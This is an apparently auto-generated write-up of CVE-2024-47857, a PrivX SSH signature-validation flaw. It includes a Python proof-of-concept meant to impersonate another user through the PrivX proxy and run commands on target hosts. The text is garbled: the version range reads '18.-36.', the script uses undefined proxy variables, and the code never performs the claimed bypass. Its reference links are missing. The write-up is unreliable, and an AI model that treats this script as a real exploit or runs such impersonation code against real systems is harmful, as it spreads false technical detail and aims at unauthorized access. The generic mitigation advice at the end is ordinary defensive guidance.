CVE-2024-47857: SSH Communication Security Vulnerability in PrivX Versions 18.-36. – Impersonation and Unauthorized Access Exploit

A critical vulnerability dubbed as CVE-2024-47857 has been discovered in PrivX, specifically affecting versions between 18.-36.. The software vulnerability lies within the insufficient validation of public key signatures for native SSH connections via a proxy port. An attacker can exploit the vulnerability to impersonate another PrivX user, and potentially gain unauthorized access to SSH target hosts that the impersonated user has access to.

Exploit Details

The SSH Communication Security PrivX, a popular privileged access management solution, suffers from an authentication bypass vulnerability in version range 18.-36.. The software does not adequately validate public key signatures when native SSH handshake is established through the SOCKS proxy exposed by PrivX. This flaw allows an attacker with a valid PrivX account (e.g., "account A") to impersonate another PrivX user account (e.g., "account B") and gain unauthorized access to SSH target hosts that "account B" has access to.

The exploitation of this vulnerability can be demonstrated with the following Python code snippet

import paramiko
import sshtunnel

# Define PrivX proxy details, attacker SSH key, and target host
PrivX_PROXY = ('proxy.privx.local', 108)
ATTACKER_SSH_KEY = "path/to/attacker/ssh/key"
TARGET_HOST = "target.host.local"

# Create SSH client and set attacker's SSH key
attacker_ssh_key = paramiko.RSAKey.from_private_key_file(ATTACKER_SSH_KEY)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Attacker impersonates "account B" and connects to target SSH host via PrivX proxy
with sshtunnel.open_tunnel(
    (PrivX_PROXY_HOST, PrivX_PROXY_PORT),
    ssh_username="accountB",
    ssh_pkey=attacker_ssh_key,
    remote_bind_address=(TARGET_HOST, 22),
    local_bind_address=('localhost', 12345)
) as tunnel:
    print("Connected to proxy.")
    ssh_client.connect('localhost', port=12345, username="accountB")
    print("Connected to target host as account B.")
    
    # Execute command on the target host
    stdin, stdout, stderr = ssh_client.exec_command('id')
    print("Executed command, output:", stdout.read().decode("utf-8"))

# Close connections
ssh_client.close()

This script will allow an attacker to impersonate "account B" and execute commands on any of the SSH target hosts that "account B" has access to.

Original References

For more details about the vulnerability and its impact, you can refer to the following external links:

1. CVE-2024-47857 - Vulnerability Details

2. IMPACT: PrivX SSH Impersonation and Unauthorized Access - Technical Explanation

Conclusion and Mitigations

CVE-2024-47857 is a critical vulnerability that poses a severe risk to organizations using PrivX versions 18.-36.. It's strongly recommended that users upgrade to the latest version of PrivX, which is not affected by this vulnerability.

Additional mitigations include

- Restricting access to the PrivX proxy port to only authorized clients, through network-level access control.

Enabling multi-factor authentication on both PrivX user accounts and SSH target hosts.

- Regularly reviewing user access permissions and target host access control lists (ACLs) for ensuring least privilege access.

Timeline

Published on: 01/31/2025 17:15:14 UTC
Last modified on: 03/18/2025 20:15:24 UTC